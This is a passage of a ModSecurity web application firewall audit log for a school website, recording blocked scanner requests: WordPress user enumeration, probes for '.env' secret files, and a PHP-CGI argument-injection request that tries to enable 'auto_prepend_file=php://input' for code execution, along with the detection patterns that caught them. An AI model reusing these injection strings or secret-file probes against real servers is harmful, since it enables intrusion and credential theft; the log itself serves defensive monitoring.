(CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748031658354319 4276 (- - -) Stopwatch2: 1748031658354319 4276; combined=2294, p1=710, p2=1546, p3=0, p4=0, p5=37, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9b8a507-Z-- --832ffd38-A-- [24/May/2025:03:31:44 +0700] aDDbMG_WNRyhaqaKDLyBLgAAAMg 103.236.140.4 53912 103.236.140.4 8181 --832ffd38-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --832ffd38-C-- --832ffd38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --832ffd38-E-- --832ffd38-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748032304544764 3827 (- - -) Stopwatch2: 1748032304544764 3827; combined=2545, p1=514, p2=1999, p3=0, p4=0, p5=31, sr=56, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --832ffd38-Z-- --59a54622-A-- [24/May/2025:03:35:44 +0700] aDDcIFYzwfxII7zMfyFjbAAAAAQ 103.236.140.4 33986 103.236.140.4 8181 --59a54622-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.48.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --59a54622-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59a54622-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748032544419844 3289 (- - -) Stopwatch2: 1748032544419844 3289; combined=2104, p1=624, p2=1445, p3=0, p4=0, p5=35, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59a54622-Z-- --aa1c784b-A-- [24/May/2025:03:43:40 +0700] aDDd_G_WNRyhaqaKDLyNPgAAANY 103.236.140.4 50858 103.236.140.4 8181 --aa1c784b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.252.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.252.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aa1c784b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa1c784b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748033020150661 3287 (- - -) Stopwatch2: 1748033020150661 3287; combined=1782, p1=557, p2=1196, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa1c784b-Z-- --a6bccc6a-A-- [24/May/2025:03:45:25 +0700] aDDeZW_WNRyhaqaKDLyP9QAAAMQ 103.236.140.4 54652 103.236.140.4 8181 --a6bccc6a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.252.145.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.252.145.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a6bccc6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6bccc6a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748033125685785 3855 (- - -) Stopwatch2: 1748033125685785 3855; combined=2408, p1=682, p2=1687, p3=0, p4=0, p5=39, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6bccc6a-Z-- --ca67a55a-A-- [24/May/2025:04:19:14 +0700] aDDmUvmzt4abyoi_U9lu4wAAAIE 103.236.140.4 37638 103.236.140.4 8181 --ca67a55a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 205.201.200.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 205.201.200.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ca67a55a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca67a55a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748035154266092 2364 (- - -) Stopwatch2: 1748035154266092 2364; combined=1172, p1=406, p2=739, p3=0, p4=0, p5=27, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca67a55a-Z-- --ea80c15c-A-- [24/May/2025:04:20:52 +0700] aDDmtOunkxaVeh4NwhZXOQAAAEY 103.236.140.4 39000 103.236.140.4 8181 --ea80c15c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 168.227.104.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 168.227.104.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ea80c15c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea80c15c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748035252898920 2655 (- - -) Stopwatch2: 1748035252898920 2655; combined=1161, p1=395, p2=738, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea80c15c-Z-- --a793a72e-A-- [24/May/2025:04:25:01 +0700] aDDnreO2UzDOKMmK0i4uIgAAAAQ 103.236.140.4 39674 103.236.140.4 8181 --a793a72e-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.169.186.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.169.186.169 X-Forwarded-Proto: http Connection: close --a793a72e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a793a72e-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748035501240518 3271 (- - -) Stopwatch2: 1748035501240518 3271; combined=1304, p1=540, p2=733, p3=0, p4=0, p5=31, sr=152, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a793a72e-Z-- --bcf3cb1b-A-- [24/May/2025:04:39:20 +0700] aDDrCOunkxaVeh4NwhZYjwAAAEw 103.236.140.4 42864 103.236.140.4 8181 --bcf3cb1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.16.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.16.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bcf3cb1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcf3cb1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748036360250813 3010 (- - -) Stopwatch2: 1748036360250813 3010; combined=1302, p1=436, p2=836, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcf3cb1b-Z-- --95ca5353-A-- [24/May/2025:04:43:00 +0700] aDDr5DvI5DIWBJ2mFG7NwQAAAMc 103.236.140.4 43876 103.236.140.4 8181 --95ca5353-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3889.0 Safari/537.36 Accept-Charset: utf-8 --95ca5353-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95ca5353-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748036580198879 863 (- - -) Stopwatch2: 1748036580198879 863; combined=314, p1=276, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95ca5353-Z-- --d433cf5f-A-- [24/May/2025:04:45:35 +0700] aDDsf_mzt4abyoi_U9lwTwAAAII 103.236.140.4 44262 103.236.140.4 8181 --d433cf5f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.210.185.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.210.185.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d433cf5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d433cf5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748036735525173 3294 (- - -) Stopwatch2: 1748036735525173 3294; combined=1345, p1=454, p2=861, p3=0, p4=0, p5=29, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d433cf5f-Z-- --2193fe3a-A-- [24/May/2025:04:47:19 +0700] aDDs5_mzt4abyoi_U9lwUQAAAIM 103.236.140.4 44268 103.236.140.4 8181 --2193fe3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 34.76.253.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 34.76.253.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2193fe3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2193fe3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748036839342702 2847 (- - -) Stopwatch2: 1748036839342702 2847; combined=1300, p1=428, p2=842, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2193fe3a-Z-- --ff2eb604-A-- [24/May/2025:05:08:36 +0700] aDDx5Pmzt4abyoi_U9lwbgAAAJU 103.236.140.4 44438 103.236.140.4 8181 --ff2eb604-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.147.185.248 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.147.185.248 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --ff2eb604-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff2eb604-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748038116654342 916 (- - -) Stopwatch2: 1748038116654342 916; combined=404, p1=362, p2=0, p3=0, p4=0, p5=42, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff2eb604-Z-- --266ba142-A-- [24/May/2025:05:08:37 +0700] aDDx5TvI5DIWBJ2mFG7N3QAAAMw 103.236.140.4 44442 103.236.140.4 8181 --266ba142-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.147.185.248 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.147.185.248 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --266ba142-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --266ba142-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748038117532097 713 (- - -) Stopwatch2: 1748038117532097 713; combined=283, p1=249, p2=0, p3=0, p4=0, p5=33, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --266ba142-Z-- --66a13974-A-- [24/May/2025:05:19:38 +0700] aDD0euO2UzDOKMmK0i4vbwAAABQ 103.236.140.4 44494 103.236.140.4 8181 --66a13974-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 89.121.140.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.121.140.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --66a13974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66a13974-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748038778778657 2888 (- - -) Stopwatch2: 1748038778778657 2888; combined=1285, p1=419, p2=836, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66a13974-Z-- --1c546300-A-- [24/May/2025:05:41:14 +0700] aDD5ivmzt4abyoi_U9lwhAAAAIw 103.236.140.4 44570 103.236.140.4 8181 --1c546300-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.137.134.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.137.134.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c546300-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c546300-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748040074178565 2306 (- - -) Stopwatch2: 1748040074178565 2306; combined=957, p1=317, p2=621, p3=0, p4=0, p5=19, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c546300-Z-- --81eb6663-A-- [24/May/2025:05:44:19 +0700] aDD6Q_mzt4abyoi_U9lwjAAAAIA 103.236.140.4 44586 103.236.140.4 8181 --81eb6663-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 Accept-Charset: utf-8 --81eb6663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81eb6663-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748040259486937 793 (- - -) Stopwatch2: 1748040259486937 793; combined=327, p1=289, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81eb6663-Z-- --9650565d-A-- [24/May/2025:05:47:17 +0700] aDD69fmzt4abyoi_U9lwkAAAAIg 103.236.140.4 44602 103.236.140.4 8181 --9650565d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; vivo 1726) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --9650565d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9650565d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748040437468532 842 (- - -) Stopwatch2: 1748040437468532 842; combined=366, p1=327, p2=0, p3=0, p4=0, p5=38, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: 